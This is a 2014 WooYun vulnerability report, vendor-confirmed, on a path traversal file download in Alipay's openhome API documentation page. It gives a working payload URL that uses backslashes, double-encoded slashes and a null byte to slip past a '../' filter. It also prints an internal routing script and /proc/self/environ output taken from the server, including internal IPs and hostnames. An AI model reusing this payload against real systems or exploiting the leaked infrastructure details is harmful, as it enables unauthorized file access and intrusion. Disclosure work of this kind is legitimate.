当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051761

漏洞标题:支付宝一个修复后被忽略的漏洞再次进行任意文件遍历下载

相关厂商:支付宝

漏洞作者: 想买一辆车

提交时间:2014-02-23 02:22

修复时间:2014-04-09 02:22

公开时间:2014-04-09 02:22

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-23: 细节已通知厂商并且等待厂商处理中
2014-02-25: 厂商已经确认,细节仅向厂商公开
2014-03-07: 细节向核心白帽子及相关领域专家公开
2014-03-17: 细节向普通白帽子公开
2014-03-27: 细节向实习白帽子公开
2014-04-09: 细节向公众公开

简要描述:

看到一个乌云上支付宝的漏洞被忽略了,说漏洞不存在,但是一般乌云的作者提交的都应该是真实的,于是研究了一把看怎么回事

详细说明:

应用程序漏洞没修复,采取了防火墙进行修复,但是只过滤了../

https://openhome.alipay.com/doc/viewApiDoc.htm?name=alipay.micropay.order.freezepayurl.get&version=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\%252Fetc%252Fpasswd%2500&subVersion=1.0&packageCode=MICROPAY


就可以继续插入了

zhifubao.png

漏洞证明:

写了个脚本看了一些,太累了,睡觉

php abc.php '/usr/local/sbin/route.sh'
#!/usr/bin/env bash
# by yuchen.ying@alipay.com
# update at 2012-08-10
function has_iproute2(){
which ip &>/dev/null
}
function get_default_route(){
defgw=$( ip route|grep ^default|awk '{print $3}' )
echo $defgw
}
#app default gw
function add_default_route(){
if [[ "x$defgw" != "x" ]]
then
return
fi
current_gw=$( ip route get 172.17.0.0 | head -n1 | awk '{print $3}' )
defgw=$( echo $current_gw | tr '.' ' '| awk '{$4=1;print}' | tr ' ' '.' )
dev=$( ip route get 172.17.0.0|head -n1|awk '{print $5}' )
ip route add default via $defgw dev $dev
}
#ccdc default gw
function add_ccdc_default_route(){
if [[ "x$defgw" != "x" ]]
then
return
fi
current_gw=$( ip route get 172.17.0.0 | head -n1 | awk '{print $3}' )
defgw=$( echo $current_gw | tr '.' ' '| awk '{$4=1;print}' | tr ' ' '.' )
dev=$( ip route get 172.17.0.0|head -n1|awk '{print $5}' )
ip route add default via $defgw dev $dev
}
has_iproute2
if [[ $? -ne 0 ]]
then
echo "NO iproute2 available!" >&2
exit 1
fi
defgw=$( get_default_route )
domain=$( alidomain )
appname=$( hostname | sed 's/-.*//g' )
zmfmachine=$( hostname |awk -F"-" '{print $2}' )
if [[ "x$zmfmachine" = "x61" ]]
then
exit 0
fi
if [[ "x$domain" != "xzue.alipay.com" ]] && [[ "x$domain" != "xztg.alipay.com" ]] && [[ "x$domain" != "xzth.alipay.com" ]]
then
exit 0
fi
case $appname in
accenter|accordercore|accorderexprod|accore|acctrans|acctransquery|acrmng|acm|addp|airbops|airmng|airprod|airquery|aliapi|aliprod|apimg|appstore|articlemng|assets|authcenter|bankgw|barcodeprod|batchpay|batchpayprod|bcgw|bcm|bdcrm|bdcrmtask|biscenter|bops|bopstask|bossimg|bumng|ca|cacrl|cagw|caprod|cardbin|cashier|certify|certifycore|cfmng|channelrouter|charge|charityprod|cif|clive|clivecenter|clivemng|cmscenter|codfund|codposcore|codprod|commission|communityapi|communitymng|communityprod|communityweb|consumecenter|consumequery|consumequeryhis|couponcore|couponweb|couriercore|creditcore|creditprod|cryptprod|csmng|ctu|ctufm|ctutask|dbackprod|diamond|discount|discountcore|download|dwmds|ebppcore|ebppprod|ecmng|enterprise|escrowexprod|excashier|financemng|financeprod|forexcore|forexprod|fundapi|fundcardprod|fundgw|fundmng|fundpay|fundprod|fundselling|godzilla|gotone|help|home|humomeo|ibccore|image|insuranceprod|ivrprod|jade|katong|katongprod|katongprodsign|katongweb|kbmng|kmi|lifeexprod|lifemng|linepay|mali|mapi|mapitool|mashup|mbill|mbillexprod|mcashier|mcenter|mdeduct|memberexprod|memberprod|memberweb|merchant|merchantprod|merchantsettle|merchantweb|mergepayprod|mfdprod|mfrontgw|mibap|minitrans|mipgw|mktbi|mktcust|mktimg|mktmng|mktpub|mlifeprod|mmng|mmonitormng|mmprod|mnotify|mobile|mobilebc|mobilecore|mobilecpprod|mobilecsprod|mobilepmgw|mobilepp|mobileprod|mobiless|mobileumidprod|monitorevent|morderprod|mquery|msgbroker|neo|oakdf|oakmng|oakpkg|openapi|openauth|opsres|ordermng|otp|pay|paycore|paygw|payrouter|paytask|pcardmng|personal|personalprod|personalportal|pointcore|pointer|pointgw|pointmng|pointndcprod|pointprod|posmng|prepaidcore|prepaidprod|process|processmng|prodcore|prodmng|prodswitch|prodtrans|productchannel|promo|promoevent|promomng|promoomeo|promoprod|promoprodtrans|pucprod|punishcenter|rds|rebateprod|recommend|recon|reservemng|revcore|revmng|revtrans|riskmng|salesmng|sany|seccliprod|securitycenter|securitycore|securitydata|securitygw|securityidentify|securityprod|securityprodmng|selfhelpprod|settlecore|settleprod|settlequery|slotscheduler|smsgw|sofaops|span|staticproxy|statusbar|storagemng|support|swquery|syslog|tbapi|ticketcore|ticketgw|ticketweb|timeout|trade|tradecmtweb|tradeexprod|tradefront|tradequery|tradequeryhis|tradequeryprod|tvprod|umidprod|ustrans|viceroy|virtualprod|wap|wapcashier|xts|ylgw|yzt|zconsole|zrouter|mobileua|secclientgw|combmng|homeproxy|mobilespcore|dnspre|unifygw|sigw|maliprod|crawler|crawlerdpc|bizprodmng|zanalysis|tracker|mobilepos|payadmin|payadmintask|pay-admin|ebppgw|chat|live|toolprod|supergwabc|supergw|supergwcmb|supergwccb|supergwicbc|supergwsmall|fininflux|consumeprod|sftptask|mobilecmng|openexprod|monitorcenter|ntp|webhost|netadmin|survey|workflow|sysinstall|filebridge|gpmng|build|mobileacauth|scm|appdb|findecision|sachores|shtermdb|evoucherprod|kabaoprod|mfgw|sysmng|alicloudsftp|dconfig|znetwork|dwrtsys|superapi|supergwext|mobilecellpay|openhome|omeo|promoomeo|maliprod|zscale|lvsmng|mdmng|clientcashier|intranetproxy|gotonemng|mobileapp|admintools|lvsldcmng|opsrms|repo|admintools|dwdata|dwdis|mobilecashier|nagios|ebppweb|puppet|alipassprod|uibeta|mobilesecurity|aggrbillinfo|maliprod|supergwfront|mobilecashier|clientcashier|mobileacauth|zacm|tmdsvr|abossmonitor|zauth|zsecurity|zappinfo|publichome|dapanweb|tradecloud|opssla|dapanweb|ucrmng|mobilecodec|cscenter|ucrmng|adc|crawlerdpcwallet|crawlerwallet|securitydataproc|publiccore|promoadprod|csaccurate|mdataprod|mobilediscovery|mobiledownload|dwdssp)
add_default_route;
;;
mdatasync|zacm|mobilebill|monitorweb|monitorstbweb|pcreditprod|anatops)
# ????̫????, ??д????? -- ruohan.chen
add_default_route;
;;
ccdcapi|counter|ibcgw|countcore|posgw|bizrecon|ccrprod|pointgwsec|supergwpci|posproxy|bipgw|mobilesp|chcrp|wkprod|chcmbpos|pcimnotify)
add_ccdc_default_route;
;;
esac
if [[ "x$appname" == "xkatong" ]]
then
current_gw=$( ip route get 172.17.0.0 | head -n1 | awk '{print $3}' )
defgw=$( echo $current_gw | tr '.' ' '| awk '{$4=5;print}' | tr ' ' '.' )
dev=$( ip route get 172.17.0.0|head -n1|awk '{print $5}' )
for ip in 20.3.101.99 130.100.9.182
do
ip route get $ip &>/dev/null
if [[ $? -ne 0 ]]
then
ip route add $ip via $defgw dev $dev
fi
done
fi


php abc.php '/proc/self/environ'
HOSTNAME=openhome-70-1SHELL=/bin/bashHISTSIZE=1000SSH_CLIENT=10.215.91.142 60719 22NLS_LANG=AMERICAN_AMERICA.ZHS16GBKJBOSS_HOME=/opt/taobao/jbossANT_HOME=/opt/taobao/antSVN_EDITOR=viUSER=adminJAVA_OPTS=-server -Xms1800m -Xmx1800m -Xmn680m -Xss256k -XX:PermSize=340m -XX:MaxPermSize=340m -XX:+UseConcMarkSweepGC -XX:+UseParNewGC -XX:CMSFullGCsBeforeCompaction=5 -XX:+UseCMSCompactAtFullCollection -XX:+CMSClassUnloadingEnabled -XX:+DisableExplicitGC -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCTimeStamps -Dcom.sun.management.jmxremote.port=9981 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false -Dprogram.name=run.shLS_COLORS=LD_LIBRARY_PATH=/opt/taobao/install/jdk1.6.0_33/jre/lib/i386/server:/opt/taobao/install/jdk1.6.0_33/jre/lib/i386:/opt/taobao/install/jdk1.6.0_33/jre/../lib/i386:/home/admin/openhome-run/libexec:/opt/taobao/oracle:/opt/taobao/oracle/lib:KDEDIR=/usrPIP_CONFIG_FILE=/etc/pip.confMAIL=/var/spool/mail/adminPATH=/home/utils/grep+:/opt/taobao/java/bin:/opt/taobao/antx/bin:/opt/taobao/ant/bin:/opt/taobao/mysql/bin:/opt/taobao/install/R/bin:/opt/taobao/install/gnupg/bin:/usr/kerberos/bin:/sbin:/bin:/usr/local/sbin:/usr/sbin:/usr/local/bin:/usr/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/binTNS_ADMIN=/home/admin/openhome-run/oracle/network/admin/tnsnames.oraANTX_HOME=/opt/taobao/antxINPUTRC=/etc/inputrcPWD=/home/admin/openhome-run/binJAVA_HOME=/opt/taobao/javaLANG=zh_CN.GB18030SHLVL=5HOME=/home/adminGNUPG_HOME=/opt/taobao/install/gnupgLOGNAME=adminSSH_CONNECTION=10.215.91.142 60719 10.225.4.26 22LESSOPEN=|/usr/bin/lesspipe.sh %sMYSQL_HOME=/opt/taobao/mysqlORACLE_HOME=/home/admin/openhome-run/oracleCLOUDENGINE_HOME=/opt/taobao/cloudengineHISTTIMEFORMAT=[%Y-%m-%d %H:%M:%S] G_BROKEN_FILENAMES=1_=/opt/taobao/java/bin/java


不多看了

修复方案:

版权声明:转载请注明来源 想买一辆车@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2014-02-25 08:35

厂商回复:

感谢您对支付宝安全的关注。

最新状态:

暂无